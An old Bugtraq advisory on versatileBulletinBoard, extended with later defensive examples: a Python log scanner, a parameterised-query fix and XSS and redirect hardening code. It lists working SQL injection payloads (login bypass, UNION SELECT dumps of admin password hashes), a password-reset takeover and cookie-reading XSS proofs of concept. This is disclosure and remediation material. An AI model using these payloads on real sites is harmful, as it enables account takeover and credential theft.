Message-ID: <20051010222315.473.qmail@securityfocus.com>
Date: 10 Oct 2005 22:23:15 -0000
From: rgod@...ceposta.it
To: bugtraq@...urityfocus.com
Subject: versatileBulletinBoard V1.0.0 RC2 (possibly prior versions) multiple SQL injection vulnerabilities / login bypass / board takeover
versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
multiple SQL Injection vulnerabilities / login bypass / cross site scripting / information disclosure
software: versatileBulletinBoard V1.0.0 RC2 (possibly prior versions)
site: http://vbb.eniki.de/
precondition: magic_quotes_gpc off...
A)
i) SQL INJECTION / LOGIN BYPASS
you can log in as admin by typing:
login: ' or 1 and name='[adminname]'/*
pass: [whatever]
you can also log in with the credentials/rights of any other user by typing:
login: ' or 1 and name='[username]'/*
pass: [whatever]
ii) SQL INJECTION in the "search this thread" feature when browsing the forum:
%')UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user where name='[admin_nickame]'/*
(the input field is too short to type this by hand, but the POST request can be modified...)
iii) SQL INJECTION in the index.php "select" argument
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
iv) SQL INJECTION in the index.php "categ" argument
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
also, we have:
http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
(this lists the user ID of any user, which will be useful later, as you will see... however, the admin's user ID is usually "11")
v) SQL INJECTION in the "to" argument when posting a private message (you need to be logged in to do this):
http://[target]/[path]/index.php?target=pm&to='UNION%20SELECT%20pass%20FROM%20vbb_user%20WHERE%20name='[admin_nickname]'/*
vi) SQL INJECTION in the "search for posts" feature:
%'UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pass FROM vbb_user/*
vii) SQL INJECTION in userlistpre.php:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20pass,0,0,0%20FROM%20vbb_user%20WHERE%20name='[admin_name]'/*
viii) SQL INJECTION when viewing a user profile:
http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/*
with ii), iii), iv), v), vi), vii) and viii) the admin's MD5 password hash is displayed on screen
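The UNION SELECT URLs above all leave the same traces in a web server's access log: a percent-encoded query parameter that, once decoded, carries `UNION SELECT`, a quote followed by the `/*` comment opener, or a `' or` tautology. The following is an added example, not part of the original advisory: a small Python scanner that parses Common/Combined Log Format lines, decodes each query parameter as many times as needed (so a double-encoded payload is inspected in the form the application would see), and reports the matching parameter. The log lines are constructed for this example; the client addresses, the `/vbb/` path and the `10/Oct/2005` timestamps are assumptions, and the request strings only copy the shape of the URLs in the advisory.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from any real server). The
# request strings copy the shape of the advisory's URLs, with [target]/[path]
# replaced by the hypothetical path /vbb/. The "to" request is double-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2005:22:00:01 +0000] "GET /vbb/index.php?target=forum&categ=3 HTTP/1.1" 200 4521
10.0.0.9 - - [10/Oct/2005:22:00:07 +0000] "GET /vbb/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass%20FROM%20vbb_user%20where%20name='admin'/* HTTP/1.1" 200 3310
10.0.0.7 - - [10/Oct/2005:22:00:09 +0000] "GET /vbb/index.php?target=search&q=o%27brien HTTP/1.1" 200 1800
10.0.0.9 - - [10/Oct/2005:22:00:12 +0000] "GET /vbb/userlistpre.php?list='%20or%20isnull(1/0)/* HTTP/1.1" 200 9900
10.0.0.9 - - [10/Oct/2005:22:00:15 +0000] "GET /vbb/index.php?target=pm&to=%2527%2520UNION%2520SELECT%2520pass%2520FROM%2520vbb_user/* HTTP/1.1" 200 640
"""

# Indicators drawn from the payload shapes in the advisory: a UNION SELECT
# appended to the original query, a quote directly followed by the MySQL
# comment opener that discards the rest of the statement, and a quote-OR
# tautology. A lone apostrophe (o'brien) is deliberately not an indicator.
SQLI_PATTERNS = (
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.IGNORECASE)),
    ("quote-comment", re.compile(r"'\s*/\*")),
    ("quote-or", re.compile(r"'\s*or\s+", re.IGNORECASE)),
)

# Common Log Format: client ident user [time] "METHOD request proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<request>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def decode_layers(value, max_passes=3):
    """Percent-decode repeatedly so a double-encoded payload (%2527 -> %27 -> ')
    is inspected in its final form, as the application would see it."""
    for _ in range(max_passes):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_query(query):
    """Return (parameter, indicator) pairs for each query parameter whose
    fully decoded value matches one of the indicators."""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        decoded = decode_layers(value)
        for label, pattern in SQLI_PATTERNS:
            if pattern.search(decoded):
                hits.append((name, label))
    return hits


def scan_log(text):
    """Scan log lines and return one finding per request whose query string
    carries at least one indicator."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        parts = urlsplit(m.group("request"))
        hits = scan_query(parts.query)
        if hits:
            findings.append({
                "client": m.group("client"),
                "time": m.group("time"),
                "script": parts.path,
                "hits": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['time']} {finding['client']} {finding['script']} {finding['hits']}")
```

The scanner works on GET requests only; the "search this thread" payloads in ii) and vi) travel in a POST body, which an ordinary access log does not record, so those need the application's own request logging or a WAF in front of it.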
ix) SQL INJECTION: lists all users, which could be used to dump all passwords from the database:
http://[target]/[path]/userlistpre.php?list='%20or%20isnull(1/0)/*
to check whether your installation is vulnerable, type a single ' in the login field; if you get an SQL error, it is
x) SQL INJECTION in the "forgot password" feature: a user can manipulate the email field to have new passwords for any admin or user sent to himself
you will receive a link like this:
http://[target]/[path]/index.php?target=setpass&u=11&ph=[your old MD5 password hash]
to set a new password, but... you can call this URL at any time if you have the hash
combining these issues a user can take full control of the board, reset all passwords...
proof of concept exploit incoming...
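The root cause shared by issues i) through x) is that request parameters are spliced into SQL text, with magic_quotes_gpc as the only barrier. The block below is an added example written for this page, not code from versatileBulletinBoard: it rebuilds a constructed `vbb_user` table in an in-memory SQLite database (only the column names ID, name and pass come from the advisory; the rows are made up), shows the string-built login query that the i) payload bypasses, and beside it the parameterised version plus the type-checked handling for the integer "select"/"categ"/"to"-style arguments. Passwords are stored as MD5 hex digests because that is what the advisory describes the board exposing; a real application should use a slow password hash. SQLite, like MySQL, treats an unterminated `/*` as a comment running to the end of the statement, so the bypass behaves the same way here.

```python
import hashlib
import hmac
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the board's vbb_user table.
    Column names follow the advisory; users and passwords are made up."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE vbb_user (ID INTEGER PRIMARY KEY, name TEXT, pass TEXT)")
    users = [(11, "admin", "correct horse"), (12, "alice", "battery staple")]
    con.executemany(
        "INSERT INTO vbb_user (ID, name, pass) VALUES (?, ?, ?)",
        [(uid, name, hashlib.md5(pw.encode()).hexdigest()) for uid, name, pw in users],
    )
    return con


def login_vulnerable(con, login, password):
    """The defect class behind issue i): the login string is pasted into the
    SQL text, so ' or 1 and name='admin'/* turns the WHERE clause into
    name='' OR (1 AND name='admin') and comments out the password check.
    Returns (ID, name) on success, None otherwise."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = f"SELECT ID, name FROM vbb_user WHERE name='{login}' AND pass='{pw_hash}'"
    return con.execute(sql).fetchone()


def login_fixed(con, login, password):
    """Parameterised lookup: the login string is bound as data and never parsed
    as SQL, so quotes and comment markers in it are just characters. The hash
    comparison is done application-side in constant time."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = con.execute(
        "SELECT ID, name, pass FROM vbb_user WHERE name = ?", (login,)
    ).fetchone()
    if row is None or not hmac.compare_digest(row[2], pw_hash):
        return None
    return (row[0], row[1])


def fetch_user_by_id(con, raw_param):
    """Hardened handling for integer arguments such as "select", "categ" and
    "to" (issues iii, iv, v, viii): validate the type first, then bind it.
    Anything that is not a positive integer is rejected outright."""
    try:
        user_id = int(raw_param)
    except (TypeError, ValueError):
        return None
    if user_id <= 0:
        return None
    return con.execute("SELECT ID, name FROM vbb_user WHERE ID = ?", (user_id,)).fetchone()


if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1 and name='admin'/*"  # the login string from issue i)
    print("vulnerable:", login_vulnerable(db, bypass, "whatever"))
    print("fixed:     ", login_fixed(db, bypass, "whatever"))
    print("fixed ok:  ", login_fixed(db, "alice", "battery staple"))
    print("id param:  ", fetch_user_by_id(db, "11"),
          fetch_user_by_id(db, "'UNION SELECT pass FROM vbb_user/*"))
```

Note that the fix does not depend on magic_quotes_gpc or on any escaping of the input at all; binding the value keeps it out of the parser regardless of what it contains, which is also why the ix) and x) variants (a different column, a different script) need no special-casing once every query is written this way.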
B)
xi) XSS:
possible cross-site scripting; a crafted URL redirects the user to an arbitrary location:
http://[target]/[path]/dereferrer.php?url=http://[evil_site]/[evil_script]
and user cookies can be read, PoC:
http://[target]/[path]/dereferrer.php?url=%25%2522><script>alert(document.cookie)</script><!--
http://[target]/[path]/imagewin.php?file="><script>alert(document.cookie)</script>
also, crafted URLs that manipulate SQL queries can make the page show injected JavaScript, PoC:
http://[target]/[path]/userlistpre.php?list='%20UNION%20SELECT%20"<script>alert(document.cookie)</script>",0,0,0%20FROM%20vbb_user/*
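Section B describes three distinct output problems: dereferrer.php forwards to whatever the "url" parameter says, imagewin.php and dereferrer.php reflect a parameter into the page unescaped, and userlistpre.php prints database values unescaped, so a string injected into the result set lands in the HTML. The block below is an added example, not code from versatileBulletinBoard, showing one hardened handler for each: an allowlist check for the redirect target (the host forum.example and the allowed-host set are assumptions), a filename allowlist for the image parameter, and HTML escaping of every value that reaches the page. It also handles the edge cases a redirect check is usually tripped up by: scheme-relative `//host`, backslashes, `javascript:` and userinfo-in-URL tricks.

```python
import html
import re
from urllib.parse import urlsplit

# Hosts this site may redirect to (constructed; a real deployment would read
# this from its configuration). Same-site relative paths are always allowed.
ALLOWED_HOSTS = {"forum.example"}

# A plain relative file name: starts with an alphanumeric, then a limited
# character set. No scheme, no leading dot, no quotes or angle brackets.
SAFE_FILE_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_./-]*$")


def safe_redirect_target(url, allowed_hosts=ALLOWED_HOSTS):
    """Validate a dereferrer.php-style 'url' parameter. Returns the URL if it
    is an absolute path on this site or an http(s) URL to an allowed host,
    otherwise None."""
    if not url or " " in url or "\\" in url or any(ord(c) < 0x20 for c in url):
        return None  # backslashes and control chars are browser-parser ambiguities
    if url.startswith("//"):
        return None  # scheme-relative (//host or ///host): always external-capable
    parts = urlsplit(url)
    if parts.scheme:
        if parts.scheme not in ("http", "https"):
            return None  # javascript:, data:, vbscript: ...
        if not parts.netloc:
            return None  # "http:/x" style, no host: reject rather than guess
        # hostname strips userinfo and port, so user@evil.example is caught
        return url if (parts.hostname or "") in allowed_hosts else None
    if parts.netloc:
        return None  # cannot happen after the // check, kept for clarity
    if not parts.path.startswith("/"):
        return None  # relative-to-current-dir or arbitrary text
    return url


def render_image_tag(file_param):
    """Build the <img> tag for an imagewin.php-style 'file' parameter: accept
    only a plain relative file name without traversal, then escape it so it
    cannot terminate the attribute even if the allowlist is later relaxed."""
    if not file_param or ".." in file_param or not SAFE_FILE_RE.match(file_param):
        return None
    return f'<img src="{html.escape(file_param, quote=True)}" alt="">'


def render_user_list(names):
    """Escape every database-supplied value before it reaches the page, so a
    string injected into the result set (the userlistpre.php PoC) is shown as
    text rather than interpreted as markup."""
    items = "".join(f"<li>{html.escape(name, quote=True)}</li>" for name in names)
    return f"<ul>{items}</ul>"


if __name__ == "__main__":
    for candidate in ["/index.php?target=forum", "https://forum.example/x",
                      "http://evil.example/", "//evil.example/", "javascript:alert(1)"]:
        print(f"{candidate!r:40} -> {safe_redirect_target(candidate)!r}")
    print(render_image_tag("uploads/pic_01.jpg"))
    print(render_image_tag('"><script>alert(document.cookie)</script>'))
    print(render_user_list(["alice", "<script>alert(document.cookie)</script>"]))
```

Escaping is the fix for the XSS itself; the redirect allowlist is needed separately because a redirect to an attacker-controlled host does not involve any script in the page, and the SQL injection behind the userlistpre.php variant is still closed at the query layer as in the previous section.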
C)
xii) information disclosure:
this is an online utility, but listing all files and their versions does not seem very safe ;)
http://[target]/[path]/getversions.php
rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta it
original advisory: http://rgod.altervista.org/versatile100RC2.html